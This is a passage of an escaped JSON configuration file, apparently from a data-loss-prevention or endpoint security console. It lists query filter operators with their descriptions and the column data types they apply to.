{\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notBetween\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is not between\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"match_any\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Matches one of the following\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"in_ipv6_subnet\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Matches subnet mask\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"between\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is between\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_gt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_ge\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_ne\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_equals\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_le\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"beforeNow\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is before now\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"olderThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is not within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"newerThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"olderThanAbsolute\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is earlier than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"newerThanFull\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is within the last full\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"newerThanAbsolute\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is later than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"between\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is between\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absNewerThanAbsolute_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absNewerThanAbsolute_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absOlderThanAbsolute_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absOlderThanAbsolute_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absBetween_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absBetween_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"discovery_inventory_with_classification_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"discovery_inventory_with_classification_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_many2many_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_many2many_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_many2many_not_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_many2many_not_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"discovery_inventory_without_classification_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"discovery_inventory_without_classification_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_resolution_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_resolution_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_resolution_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_resolution_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_gt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_equals\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_le\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_ne\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_ge\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_epo_user_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_epo_user_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_epo_user_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_epo_user_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"like\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains pattern\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_contains_words_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_contains_words_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"threatcategory_belongs\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"threatcategory_belongs\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"threatcategory_not_belongs\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"threatcategory_not_belongs\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_reviewer_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_reviewer_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_reviewer_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_reviewer_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_status_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_status_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_status_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_status_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_InnerSelect_contains_all_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_InnerSelect_contains_all_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_InnerSelect_not_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_InnerSelect_not_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_InnerSelect_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_InnerSelect_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isNull\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"isNull\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_equals\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_le\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_ne\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_gt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_ge\\\"\\r\\n \\r\\n  }\\r\\n \\r\\n ]\"",
    "type": "\"[\\r\\n \\r\\n  \\\"udlp_redacted_text\\\",\\r\\n \\r\\n  \\\"fileName\\\",\\r\\n \\r\\n  \\\"udlp_opeScanRun_col\\\",\\r\\n \\r\\n  \\\"multiselect_group\\\",\\r\\n \\r\\n  \\\"megabytes\\\",\\r\\n \\r\\n  \\\"file_parent_hash\\\",\\r\\n \\r\\n  \\\"float\\\",\\r\\n \\r\\n  \\\"productVersion\\\",\\r\\n \\r\\n  \\\"list_tags\\\",\\r\\n \\r\\n  \\\"optionGroup_enum\\\",\\r\\n \\r\\n  \\\"datVersion\\\",\\r\\n \\r\\n  \\\"percentage\\\",\\r\\n \\r\\n  \\\"udlp_incident_justification_option_col\\\",\\r\\n \\r\\n  \\\"text\\\",\\r\\n \\r\\n  \\\"udlp_abstimestamp_withoffset_col\\\",\\r\\n \\r\\n  \\\"string_enum\\\",\\r\\n \\r\\n  \\\"policycolumn\\\",\\r\\n \\r\\n  \\\"self_signed\\\",\\r\\n \\r\\n  \\\"udlp_localized_lookup\\\",\\r\\n \\r\\n  \\\"group\\\",\\r\\n \\r\\n  \\\"isNotNull\\\",\\r\\n \\r\\n  \\\"engineVersion\\\",\\r\\n \\r\\n  \\\"udlp_string_enum\\\",\\r\\n \\r\\n  \\\"eventId\\\",\\r\\n \\r\\n  \\\"udlp_oneToManySingleSelect\\\",\\r\\n \\r\\n  \\\"udlp_abstimestamp_col\\\",\\r\\n \\r\\n  \\\"double\\\",\\r\\n \\r\\n  \\\"roleuri\\\",\\r\\n \\r\\n  \\\"compositeReputation\\\",\\r\\n \\r\\n  \\\"certUpdatedRepSummaryPostgresBytea\\\",\\r\\n \\r\\n  \\\"timespan\\\",\\r\\n \\r\\n  \\\"enum\\\",\\r\\n \\r\\n  \\\"udlp_durationMilliSeconds_col\\\",\\r\\n \\r\\n  \\\"int_select\\\",\\r\\n \\r\\n  \\\"udlp_ManyToMany\\\",\\r\\n \\r\\n  \\\"non_arithmetic_int\\\",\\r\\n \\r\\n  \\\"policynode\\\",\\r\\n \\r\\n  \\\"udlp_oneToMany\\\",\\r\\n \\r\\n  \\\"eventIdInt\\\",\\r\\n \\r\\n  \\\"string_lookup\\\",\\r\\n \\r\\n  \\\"udlp_ruleId_for_operational_116\\\",\\r\\n \\r\\n  \\\"udlp_fk_lookup_col\\\",\\r\\n \\r\\n  \\\"udlp_capture_search_col\\\",\\r\\n \\r\\n  \\\"applied_tags\\\",\\r\\n \\r\\n  \\\"percentagefromstring\\\",\\r\\n \\r\\n  \\\"string\\\",\\r\\n \\r\\n  \\\"children_count\\\",\\r\\n \\r\\n  \\\"udlp_case_resolution_col\\\",\\r\\n \\r\\n  \\\"udlp_string_lookup\\\",\\r\\n \\r\\n  \\\"boolean_success\\\",\\r\\n \\r\\n  \\\"non_summable_int\\\",\\r\\n \\r\\n  \\\"long\\\",\\r\\n \\r\\n  \\\"mac\\\",\\r\\n \\r\\n  \\\"udlp_opeScan_col\\\",\\r\\n \\r\\n  \\\"ipv4\\\",\\r\\n \\r\\n  \\\"udlp_durationSeconds_col\\\",\\r\\n \\r\\n  \\\"ipv6\\\",\\r\\n \\r\\n  \\\"end_entity_certificate\\\",\\r\\n \\r\\n  \\\"udlp_mega_col\\\",\\r\\n \\r\\n  \\\"timestamp\\\",\\r\\n \\r\\n  \\\"udlp_abstimestamp_endpoint_col\\\",\\r\\n \\r\\n  \\\"certNewRepSummaryPostgresBytea\\\",\\r\\n \\r\\n  \\\"rules_names\\\",\\r\\n \\r\\n  \\\"discovery_inventory_classification\\\",\\r\\n \\r\\n  \\\"list_col\\\",\\r\\n \\r\\n  \\\"udlp_common_resolution_col\\\",\\r\\n \\r\\n  \\\"udlp_kilo_col\\\",\\r\\n \\r\\n  \\\"filePath\\\",\\r\\n \\r\\n  \\\"udlp_incident_justification_action_label_col\\\",\\r\\n \\r\\n  \\\"fileNewRepSummaryPostgresBytea\\\",\\r\\n \\r\\n  \\\"issue_type\\\",\\r\\n \\r\\n  \\\"udlp_epo_user_col\\\",\\r\\n \\r\\n  \\\"udlp_discovery_fileType_col\\\",\\r\\n \\r\\n  \\\"complianceQueryName\\\",\\r\\n \\r\\n  \\\"udlp_contains_words_col\\\",\\r\\n \\r\\n  \\\"int\\\",\\r\\n \\r\\n  \\\"udlp_discovery_scanRunId_col\\\",\\r\\n \\r\\n  \\\"threatcategory\\\",\\r\\n 